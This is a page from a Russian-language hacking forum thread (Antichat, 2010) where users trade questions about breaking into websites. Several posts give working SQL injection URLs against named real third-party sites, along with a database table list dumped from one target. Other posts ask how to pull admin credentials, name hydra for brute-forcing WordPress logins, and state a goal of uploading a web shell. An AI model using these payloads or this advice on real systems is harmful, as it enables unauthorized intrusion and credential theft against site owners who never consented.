ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #221  
Старый 03.01.2010, 22:26
Аватар для FaTRuS
FaTRuS
Познающий
Регистрация: 28.08.2006
Сообщений: 94
Провел на форуме:
327555

Репутация: 1
Отправить сообщение для FaTRuS с помощью ICQ
По умолчанию

http://www.gmedia.kz/news1.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9

Можно ли вытащить логин и пароль от админки
 
Ответить с цитированием

  #222  
Старый 03.01.2010, 22:31
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от FaTRuS  
www.prima-group.kz
http://www.prima-group.kz/index.php?cid=1525%27+union+select+1,2,3,version%2 8%29,5,6,7,8,9,user%28%29,11,12,13,14,15+--+
 
Ответить с цитированием

  #223  
Старый 03.01.2010, 23:04
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от FaTRuS  
http://www.gmedia.kz/news1.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9

Можно ли вытащить логин и пароль от админки
Можеть быть и можно было бы прочитать .htpasswd, Если бы у пользователя были привелегии работы с файлами.
Скриптом достал спиоск таблиц,может пригодиться.
Код:
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
CHANNEL
CHANNEL_NEW
CHANNEL_POLL
NEWS
NEWS1
POLL
PRICES
 
Ответить с цитированием

  #224  
Старый 04.01.2010, 10:22
Аватар для FaTRuS
FaTRuS
Познающий
Регистрация: 28.08.2006
Сообщений: 94
Провел на форуме:
327555

Репутация: 1
Отправить сообщение для FaTRuS с помощью ICQ
По умолчанию

если можешь поделись скриптом плз можешь в личку

ЭТО НЕ СПЕЦ РАЗДЕЛ ДЛЯ ТВОИХ ВОПРОСОВ

Здесь не спрашивают как тебе поломать сайт , или что с этим можно сделать
//HAXTA4OK

Последний раз редактировалось HAXTA4OK; 05.01.2010 в 13:05..
 
Ответить с цитированием

  #225  
Старый 06.01.2010, 03:45
Аватар для vsid55
vsid55
Новичок
Регистрация: 04.01.2010
Сообщений: 24
Провел на форуме:
174204

Репутация: 24
По умолчанию

Подскажите чем брутить wordpress?
 
Ответить с цитированием

  #226  
Старый 06.01.2010, 04:06
Аватар для StarFire
StarFire
Познающий
Регистрация: 11.09.2008
Сообщений: 94
Провел на форуме:
999862

Репутация: 19
Отправить сообщение для StarFire с помощью ICQ
По умолчанию

Цитата:
Сообщение от vsid55  
Подскажите чем брутить wordpress?
hydra
 
Ответить с цитированием

  #227  
Старый 10.01.2010, 17:41
Аватар для hellorin
hellorin
Новичок
Регистрация: 15.01.2008
Сообщений: 15
Провел на форуме:
203657

Репутация: 0
Отправить сообщение для hellorin с помощью ICQ
По умолчанию

Подскажите пожалуйста есть ли какие-то уязвимости в движках:
NPJ
и
WebGui

Если есть то какие
 
Ответить с цитированием

  #228  
Старый 15.01.2010, 08:04
Аватар для FaTRuS
FaTRuS
Познающий
Регистрация: 28.08.2006
Сообщений: 94
Провел на форуме:
327555

Репутация: 1
Отправить сообщение для FaTRuS с помощью ICQ
По умолчанию

У меня возник вопрос есть сайты у которы структуре php немного изменена
Допустим http://www.mister-wong.ru/stuff/#toolbar подвержены ли такие сайты уязвимостям типа sql inj или другим уязвимостям
 
Ответить с цитированием

  #229  
Старый 15.01.2010, 18:35
Аватар для sqlinjector
sqlinjector
Новичок
Регистрация: 31.12.2009
Сообщений: 19
Провел на форуме:
60679

Репутация: 10
По умолчанию

Уважаемые, несколько раз натыкался на всякие php скрипты - они же exploit-ы к форумам типа IPB и PHPBB, в.т.ч. и 3 версии.
Просьба: подскажите тему, где есть полная информация о том как этим делом пользоваться.
ОС, софт и тд..
Вот по инъекциям нашел такой ФАК http://www.hackzone.ru/news/sql_inj.html очень мне помог, хотелось бы и по cross site scripting-у
В общем в итоге хочется залить шелл, получить админа сайта как минимум.
пишите тут или в личку.. Большое спасибо!
 
Ответить с цитированием

  #230  
Старый 15.01.2010, 21:51
Аватар для kaban931
kaban931
Познающий
Регистрация: 14.10.2009
Сообщений: 39
Провел на форуме:
146967

Репутация: 2
Отправить сообщение для kaban931 с помощью ICQ
По умолчанию

Привет всем! народ подскажите пожалуйста что означает вот эта вот ошибочка

Код:
! PHP for the selected domain has failed.

Installatron is unable to install to a domain where PHP is not working.

Your hosting provider can help you resolve this error.

Error code: 1; HTTP code: 500
Заранее спасибо!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Форумы 316 08.06.2010 09:56
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP, PERL, MySQL, JavaScript 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ